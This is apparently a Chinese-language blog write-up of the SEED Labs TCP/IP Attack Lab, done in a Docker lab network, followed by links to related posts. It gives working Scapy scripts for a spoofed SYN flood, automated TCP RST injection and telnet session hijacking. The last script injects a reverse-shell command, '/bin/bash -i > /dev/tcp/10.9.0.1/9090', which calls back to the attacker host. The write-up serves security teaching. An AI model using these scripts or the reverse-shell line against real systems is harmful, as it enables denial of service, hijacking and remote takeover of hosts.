【Seed-Labs 2.0】TCP/IP Attack Lab

于 2025-01-03 20:27:16 发布
阅读量1.5k 收藏 21
点赞数 12
CC 4.0 BY-SA版权
分类专栏: 网络攻防技术 文章标签: tcp/ip 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AustinCyy/article/details/144914540

说在前面

本实验的相关文件参见官网 TCP/IP Attack Lab
本实验建议在官方提供的虚拟机环境中进行,可以参考 SEED-labs-ubuntu 20.04 虚拟机环境搭建

Lab Environment Setup

使用docker拉取实验环境镜像。实验环境中有一台攻击者,和三台主机。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Task 1: SYN Flooding Attack

SYN flood 是一种 DoS 攻击形式,攻击者向受害者的 TCP 端口发送许多 SYN 请求,但无意完成 3 路握手过程。攻击者要么使用欺骗的 IP 地址,要么不继续该过程。通过这种攻击,攻击者可以向受害者的队列灌水,该队列用于半开连接,即已完成 SYN、SYN-ACK 但尚未得到最终 ACK 的连接。当队列满时,受害者就无法再接受任何连接。下图展示了这种攻击。
在这里插入图片描述

队列的大小有一个全系统范围的设置。在 Ubuntu 操作系统中,我们可以使用以下命令查看设置。操作系统会根据系统内存大小来设置该值:内存越大,该值就越大。

# sysctl net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_syn_backlog = 128

我们可以使用 netstat-nat 命令来检查队列的使用情况,即与监听端口相关的半打开连接的数量。此类连接的状态是 SYN-RECV。如果三方握手结束,则连接状态为 ESTABLISHED

现在我们查看系统设置的排队大小范围。可以看到上限为256。

在这里插入图片描述

Task 1.1: Launching the Attack Using Python

任务内容: 使用Python实现 SYN Flooding 攻击。

1.受害主机的IP为10.9.0.5。修改 synflood.py 程序如下图所示。

#!/bin/env python3

from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits

ip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcp

while True:
    pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iP
    pkt[TCP].sport = getrandbits(16) # source port
    pkt[TCP].seq = getrandbits(32) # sequence number
    send(pkt, verbose = 0)

2.查看当前受害机的 tcp 连接:

在这里插入图片描述

3.在攻击主机上运行 synflood.py,在受害主机上查看结果(结果太长截取部分)

在这里插入图片描述

4.我们会发现此时的所有连接都是半连接状态。此时我们尝试去连接该主机。发现只有一小会连接不上,并且之后的所有连接都是瞬间连接。

在这里插入图片描述

5.第一次是因为,python 程序跑得不够快,其它用户总有机会抢过它。而之后能立即连接是因为,受害者主机记住了原来的连接。

Task 1.2: Launch the Attack Using C

任务内容: 使用C语言实现 SYN Flooding 攻击。

1.首先清除受害者主机的缓存。

在这里插入图片描述
2.运行程序查看结果,可以发现受害机的连接全部处于半连接状态。

在这里插入图片描述

3.并且我尝试连接受害机失败。

在这里插入图片描述

4.这是因为这个C语言程序运行的非常快,我的用户机在连接时抢不过该程序。

Task 1.3: Enable the SYN Cookie Countermeasure

任务内容: 启用 SYN cookie 机制,并再次运行攻击,比较结果。

1.清空缓存并启用 SYN Cookie。

在这里插入图片描述

2.再次运行 synflood,查看运行结果,可以看到队列已满,但是仍然可以连接。

在这里插入图片描述
在这里插入图片描述

Task 2: TCP RST Attacks on telnet Connections

TCP RST 攻击可终止两个受害者之间已建立的 TCP 连接。例如,如果两个用户 A 和 B 之间有一个已建立的 telnet 连接(TCP),攻击者可以伪造一个从 A 发送到 B 的 RST 数据包,从而破坏现有连接。要成功实施这种攻击,攻击者需要正确构建 TCP RST 数据包。

在此任务中,您需要从虚拟机发起 TCP RST 攻击,以破坏容器 A 和 B 之间现有的 telnet 连接。为了简化实验,我们假设攻击者和受害者在同一个局域网中,即攻击者可以观察到 A 和 B 之间的 TCP 流量。

请使用 Scapy 进行 TCP RST 攻击。下面提供了一段骨架代码。您需要将 @@@@ 替换为实际值(可以使用 Wireshark 获取):

#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=@@@@, dport=@@@@, flags="@@@@", seq=@@@@, ack=@@@@)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)

选做: 自动发起攻击。编写一个程序,使用嗅探和欺骗技术自动发起攻击。与手动方法不同,我们从嗅探数据包中获取所有参数,因此整个攻击过程都是自动化的。请确保在使用 Scapy 的嗅探函数时,不要忘记设置 iface 参数。

说明:我的操作已结合选做。

1.在宿主机查看网桥的名称为 br-b10103161082

在这里插入图片描述

2.按照信息编写 tcprst.py

#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
	ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
	tcp = TCP(sport=23, dport=pkt[TCP].dport, flags="R", seq=pkt[TCP].seq+1)
	pkt = ip/tcp
	ls(pkt)
	send(pkt, verbose=0)
	
f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-b10103161082', filter=f, prn=spoof_pkt)

3.尝试连接 10.9.0.5 时显示被关闭,成功完成任务,通过伪造RST截断连接。

在这里插入图片描述

Task 3: TCP Session Hijacking

TCP 会话劫持攻击的目的是通过向两个受害者之间的现有 TCP 连接(会话)注入恶意内容来劫持该会话。如果该连接是 telnet 会话,攻击者可将恶意命令(如删除重要文件)注入该会话,导致受害者执行恶意命令。下图 描述了攻击的工作原理。在本任务中,您需要演示如何劫持两台计算机之间的 telnet 会话。您的目标是让 telnet 服务器运行来自您的恶意命令。为简化任务,我们假设攻击者和受害者在同一局域网内。

在这里插入图片描述

手动发起攻击。请使用 Scapy 进行 TCP 会话劫持攻击。下面提供了一段骨架代码。您需要用实际值替换每个 @@@@;您可以使用 Wireshark 来计算应该在欺骗的 TCP 数据包的每个字段中填入什么值。

#!/usr/bin/env python3
from scapy.all import *

ip = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=@@@@, dport=@@@@, flags="@@@@", seq=@@@@, ack=@@@@)
data = "@@@@"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)

选做: 自动发起攻击。编写一个程序,使用嗅探和欺骗技术自动发起攻击。与手动方法不同,我们从嗅探数据包中获取所有参数,因此整个攻击过程都是自动化的。请确保在使用 Scapy 的嗅探函数时,不要忘记设置 iface 参数。

说明:我的操作已结合选做。

1.编写并运行结合嗅探和伪造的自动化攻击程序tcphijacking.py

#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
	ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
	tcp = TCP(sport=pkt[TCP].dport, dport=23,
              flags="A",
              seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
	data = "echo \"ლ(́◕◞౪◟◕‵ლ)\" >> ~/hijacking.out\n\0"
	pkt = ip/tcp/data
	ls(pkt)
	send(pkt, verbose=0)
	
f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-b10103161082', filter=f, prn=spoof_pkt)

2.可以看到 10.9.0.5 受害机上被成功写入我们的文件,攻击成功。

在这里插入图片描述

Task 4: Creating Reverse Shell using TCP Session Hijacking

当攻击者利用 TCP 会话劫持向受害者机器注入命令时,他们并不希望在受害者机器上运行一个简单的命令,而是希望运行许多命令。显然,通过 TCP 会话劫持来运行这些命令是不方便的。攻击者想要达到的目的是利用攻击设置后门,这样他们就可以利用这个后门方便地进行进一步破坏。

设置后门的一种非典型方法是从受害者机器上运行一个反向 shell,让攻击者通过 shell 访问受害者机器。反向 shell 是在远程机器上运行的 shell 进程,可连接回攻击者的机器。一旦远程机器被入侵,攻击者就可以方便地访问远程机器。在本任务中,学生需要证明他们能够实现这一目标。

1.编写 reverseshell.py

在这里插入代码片#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq + 1)
    
    # 构造反向 Shell 命令,该命令将通过 TCP 与攻击者的机器建立连接(10.9.0.1:9090)
    # 启动一个 Bash shell 并将其输入输出重定向到指定的端口,从而允许攻击者远程控制目标机器
    data = "/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\n\0" 
    pkt = ip / tcp / data
    
    send(pkt, verbose=0)

f = 'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-b10103161082', filter=f, prn=spoof_pkt)

2.在 attacker主机上开启监听:

在这里插入图片描述

3.使用telnet 连接 10.9.0.5 受害者主机,并在attacker上运行 reverseshell.py,可以看到运行结果,成功拿到 victim 的 shell:

在这里插入图片描述

SEED-Lab) TCP/IP Attack Lab
lunan的博客
02-17 7579
SEED-Lab) TCP/IP Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) TCP/IP Attack Lab一、实验目标二、实验原理三、实验过程3.1 Task 1: SYN Flooding Attack3.2 Task 2: TCP RST Attacks on telnet and ssh Connections3.2.2 SSH connection3.3 Task 3: TCP RST Attacks
SEED】网络攻防--幽灵攻击
qq_64389397的博客
01-07 792
可以看到,程序也没有成功执行分支预测,这是因为将传入的值修改为20-29之后,分支语句多次执行false,导致训练的结果是CPU会预测执行false语句,所以没有执行我们想要的分支。尝试修改usleep()的值为,100,1000,10000,可以看到,hit的值开始降低,因为时间变长之后,判断语句可能已经返回结果,不需要进行分支预测。可以看到,代码没有执行预测分支,这是因为缓存中的size数据没有被清除,导致程序直接访问缓存非常迅速,没有执行分支预测的时间。取消掉注释,将训练的代码修改为如下代码。
【信息安全】seed-labs实验-TCP/IP Attack Lab
可乐大牛的博客
12-10 4828
文件删除成功,并且客户端的光标被锁死,无法输入命令(这个是因为客户端的终端失去了正确的ack与seq,既无法发出信息,也无法接收信息,甚至无法退出。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。攻击脚本:py文件(攻击速度慢,因为是虚拟机,半连接会自动重置,要是攻击的速度赶不上重置的速度就实验失败了)
SeedLab——TCP/IP Attack Lab
最新发布
Aft3rGl0w的博客
01-14 1604
我们刚刚介绍TCP的时候,介绍了三次握手。在TCP三次握手过程中,客户端向服务器发送一个SYN(同步)包,服务器接收到后会返回一个SYN-ACK(同步-确认)包给客户端,然后等待客户端的确认(ACK)。当收到客户端的确认(ACK)后,TCP连接就建立起来了,接下来就可以使用这个连接进行通信了。
-SEED 2.0实验环境搭建
cherryc_的博客
12-03 6174
本文是在做seed lab安全实验前,将项目提供的ubuntu20.04系统安装在Virtual Box上的步骤记录和一些问题解决。
TCP/IP Attack LabSEED实验)
l4kjih3gfe2dcba1的博客
08-26 5204
TCP确实是一个漏洞百出的协议啊。。
SEED LabsTCP/IP Attack Lab
m0_48650774的博客
12-09 1041
SEED LabsTCP/IP Attack Lab
【DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
这个实验,"SEED lab:DNS Remote Attack Lab The Kaminsky Attack",旨在让你亲身体验并理解这种攻击方式。 DNS缓存中毒是一种网络安全攻击,攻击者通过篡改DNS服务器的缓存记录,将合法的域名指向错误的IP地址,...
Shellshock Attack SEED-LAB
qq_51660793的博客
10-24 1694
shellshock seed-lab
SEED Labs – Shellshock Attack Lab
qq_43252441的博客
12-22 1573
Task 1: Experimenting with Bash Function Ubuntu 16.04中的Bash程序已被修补,因此它不再容易受到Shellshock的攻击。为了本实验的目的,我们在/bin文件夹中安装了易受攻击的Bash版本。它的名字叫bash_shellshock。 我们需要在任务中使用此Bash。 请运行此易受攻击的版本的Bash,如下所示,然后设计一个实验来验证该Bash是否易受攻击Shellshock攻击与否。 $ /bin/bash_shellshock 在补丁版本的bas
SEED Labs 2.0】TCP Attacks Lab
热门推荐
Chenyang的博客
08-29 1万+
本文为 SEED Labs 2.0 - TCP Attacks Lab 的实验记录。本实验需要分清到底劫持的哪个报文,剩下的工作就很简单了。
SeedLab】BGP Exploration and Attack Lab
cold_windx的博客
08-17 3043
本实验需要使用SEED互联网仿真器(已集成到docker配置文件)。启动docker容器,配置文件在/Labsetup/outputs/目录下。由于要配置很多docker容器,所以构建+启动过程会比较漫长。.随着docker启动,仿真器也随之运行,仿真器所用到的设备均为docker容器。...
【信息安全】seed-labs实验-Secret-Key Encryption Lab
可乐大牛的博客
12-27 5390
然后我们还有一个已知的排序结果words_frequency(这个是百度搜到的字母出现频率),这两个排序结果的对应关系我们就认为是对照表了,接着使用这个对照表翻译密文得到明文out.txt。单表替换密码(将明文中的字母按照对照表映射成密文),会将明文中的统计规律带到密文中,如明文中出现最多的是A,则密文中出现最多的就是A在对照表下的密文。比如我想将DF修改成EF,做法就是选中EF(是鼠标拖动,让ED块变红),然后右键复制,选中DF右键删除,然后再右键黏贴。
【信息安全】seed-labs实验-Firewall Exploration Lab
可乐大牛的博客
02-16 5404
本实验主要就是基于LKM和Netfilter实现简单的防火墙,重点是后者。路由器是有两个ip的,一个是外网ip,一个是内网ip每一次做完实验,都要做好收尾工作(比如:模块装入之后,要记得移除;iptables命令设置完规则之后,要把对应规则删掉)
SEED Labs 2.0】V*N Tunneling Lab
Chenyang的博客
08-27 6121
本文为 SEED Labs 2.0 - V*N Tunneling Lab 的实验记录。本实验工作量较大,但难度不大,重点在于搞清是谁发给谁,走的什么路径。另外,本次实验由于网络中的设备较多,修改了环境变量方便分清哪个窗口是哪个设备。这样操作起来就方便多了。...
SeedLab6: TCP/IP Attack Lab
Rachel_IS的博客
01-19 3683
针对TCP协议的攻击实验~ 四类攻击: SYN 洪泛攻击 TCP RST攻击 TCP会话劫持 反弹shell 工具:netwox/scapy,实测netwox即可完成 SYN 洪泛攻击 先康康受害者主机半开连接的等待队列有多大: 先关掉SYN cookie机制进行攻击: 指定IP,netwox进行攻击: 能看到受害者主机有大量23号端口的半开连接: 此时如果从观察者主机telnet受害者主机,没有响应直到超时: 再打开SYN cookie进行攻击: 依然有很多很多半开连接: 但这时候从观察者
软件安全实验——lab10(二、TCP/IP攻击实验)
Onlyone_1314的博客
08-21 4921
目录标题1、实验室概况2、实验室环境2.1环撞设置2.2教师须知3、实验室的任务3.1 Task (1): ARP缓存中毒(1)80号工具攻击:(2)33号工具攻击:3.2任务(2):ICMP重定向攻击82,83,84,85,86工具:3.3任务(3):SYN flood攻击(1)关闭SYN cookie机制:76,78工具:(2)打开SYN cookie机制:3.4任务(4):针对telnet和 ssh连接的TCP RST攻击78号工具:3.5任务(5):针对流媒体应用的TCP RST攻击3.6任务(6)
SeedLab2: Buffer Overflow Vulnerability Lab
Rachel_IS的博客
01-19 1645
明明很简单的一个实验… 偏偏卡了好多天… 蜜汁Illegal Instruction & SEG fault 心力交瘁 Task 1 这个Lab一定要按要求修改chown 和 chomod 编译运行即可,康康登录shell的效果 Task 2 缓冲区溢出已经做了很多次了,思路就是把需要执行的代码写进缓冲区,函数返回地址覆盖为代码的起始地址即可 需要的只有返回地址和缓冲区首地址 gdb disass main一下,调用main之后的那条指令是0x08048574: buffer先写入AAAA定个位
华中科技大学网安学院 信息系统安全实验 软件安全 SEEDLAB 格式化字符串漏洞利用实验
Bourne的博客
06-25 5099
格式很丑 凑合看吧 懒得调了 1 实验一 软件安全 1.1 格式化字符串漏洞实验 1.1.1实验目的 在缓冲区溢出漏洞利用基础上,理解如何进行格式化字符串漏洞利用。C 语言中的 printf() 函数用于根据格式打印出字符串,使用由 printf() 函数的 % 字符标记的占位符,在打印期间填充数据。格式化字符串的使用不仅限于 printf() 函数;其他函数,例如 sprintf()、fprintf() 和 scanf(),也使用格式字符串。某些程序允许用户以格式字符串提供全部或部分内容。本实验
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值